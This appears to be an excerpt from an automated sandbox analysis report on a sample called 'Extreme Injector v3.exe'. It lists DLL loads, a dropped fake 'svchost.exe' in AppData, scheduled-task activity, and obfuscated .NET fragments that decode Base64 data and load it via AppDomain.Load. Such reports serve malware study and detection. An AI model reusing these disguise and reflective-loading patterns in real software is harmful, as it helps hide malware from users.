Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\svchost.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Extreme Injector v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Extreme Injector v3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.nedU5fdyNpDcvmN1ycO7iE7z0ubYY8eVFLmvVLnj6S0v0xV3Z43AScCvqvkpubxr5ZyfnjqfMIh0WuX0vwJoRh8,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.QCpaiZPibaDmqM5CawPMjJvddtD3lx3waxXELvPVRhA6URIEo02G2ci53J8DkAxGrRx5h6B60f8it0AhZJkdW6C,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.DtglmJNhJ8qL3gqvetVIACCzkIdUB1MbWXlY5gs8IinuS7YGlH4XQQbYMOzFrXR0JeagiTS7iNuBdmgdZEaYksn,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.EP7yJZ8EXHGN9NSEF6FHmi6DwvAR3PPmJDbNL6VzO4plUuN4EhidDPYCP2MIELPkPD8TQ3mh2P6mfTmfhIAJIHo,_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.xeQjpvOa1Azh2ni7YjQcwftWJb7Js()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VnRUpvzWzyDK5BlaMvtj7H5cMprwN[2],_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.Iy26tIhYzOYNZe964xRJ9hDeVF3im(Convert.FromBase64String(VnRUpvzWzyDK5BlaMvtj7H5cMprwN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.nedU5fdyNpDcvmN1ycO7iE7z0ubYY8eVFLmvVLnj6S0v0xV3Z43AScCvqvkpubxr5ZyfnjqfMIh0WuX0vwJoRh8,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.QCpaiZPibaDmqM5CawPMjJvddtD3lx3waxXELvPVRhA6URIEo02G2ci53J8DkAxGrRx5h6B60f8it0AhZJkdW6C,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.DtglmJNhJ8qL3gqvetVIACCzkIdUB1MbWXlY5gs8IinuS7YGlH4XQQbYMOzFrXR0JeagiTS7iNuBdmgdZEaYksn,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.EP7yJZ8EXHGN9NSEF6FHmi6DwvAR3PPmJDbNL6VzO4plUuN4EhidDPYCP2MIELPkPD8TQ3mh2P6mfTmfhIAJIHo,_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.xeQjpvOa1Azh2ni7YjQcwftWJb7Js()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VnRUpvzWzyDK5BlaMvtj7H5cMprwN[2],_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.Iy26tIhYzOYNZe964xRJ9hDeVF3im(Convert.FromBase64String(VnRUpvzWzyDK5BlaMvtj7H5cMprwN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.nedU5fdyNpDcvmN1ycO7iE7z0ubYY8eVFLmvVLnj6S0v0xV3Z43AScCvqvkpubxr5ZyfnjqfMIh0WuX0vwJoRh8,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.QCpaiZPibaDmqM5CawPMjJvddtD3lx3waxXELvPVRhA6URIEo02G2ci53J8DkAxGrRx5h6B60f8it0AhZJkdW6C,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.DtglmJNhJ8qL3gqvetVIACCzkIdUB1MbWXlY5gs8IinuS7YGlH4XQQbYMOzFrXR0JeagiTS7iNuBdmgdZEaYksn,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.EP7yJZ8EXHGN9NSEF6FHmi6DwvAR3PPmJDbNL6VzO4plUuN4EhidDPYCP2MIELPkPD8TQ3mh2P6mfTmfhIAJIHo,_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.xeQjpvOa1Azh2ni7YjQcwftWJb7Js()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VnRUpvzWzyDK5BlaMvtj7H5cMprwN[2],_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.Iy26tIhYzOYNZe964xRJ9hDeVF3im(Convert.FromBase64String(VnRUpvzWzyDK5BlaMvtj7H5cMprwN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: M33X6VISXUkeDPSGqsDK1LxRRzTq3 System.AppDomain.Load(byte[])
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV System.AppDomain.Load(byte[])
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: M33X6VISXUkeDPSGqsDK1LxRRzTq3 System.AppDomain.Load(byte[])
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV System.AppDomain.Load(byte[])
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: M33X6VISXUkeDPSGqsDK1LxRRzTq3 System.AppDomain.Load(byte[])
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV System.AppDomain.Load(byte[])
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs .Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B77D2A5 pushad ; iretd 1_2_00007FFD9B77D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B890952 push E95A98D0h; ret 1_2_00007FFD9B8909C9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B962316 push 8B485F93h; iretd 1_2_00007FFD9B96231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B78D2A5 pushad ; iretd 4_2_00007FFD9B78D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B972316 push 8B485F92h; iretd 4_2_00007FFD9B97231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B77D2A5 pushad ; iretd 7_2_00007FFD9B77D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B89BA7D push E85AA2D7h; ret 7_2_00007FFD9B89BAF9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B962316 push 8B485F93h; iretd 7_2_00007FFD9B96231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77ECE0 push ebp; iretd 11_2_00007FFD9B77ECE1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77EDE0 push ebp; iretd 11_2_00007FFD9B77EDE1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77F160 push ebp; iretd 11_2_00007FFD9B77F161
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77F7E0 push ebp; iretd 11_2_00007FFD9B77F7E1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77FA60 push ebp; iretd 11_2_00007FFD9B77FA61
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77FDE0 push ebp; iretd 11_2_00007FFD9B77FDE1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77D4F0 push ebp; iretd 11_2_00007FFD9B77D4F1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77D170 push ebp; iretd 11_2_00007FFD9B77D171
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77D870 push ebp; iretd 11_2_00007FFD9B77D871
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77DBF0 push ebp; iretd 11_2_00007FFD9B77DBF1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77DF70 push ebp; iretd 11_2_00007FFD9B77DF71
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77E070 push ebp; iretd 11_2_00007FFD9B77E071
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77E3F0 push ebp; iretd 11_2_00007FFD9B77E3F1
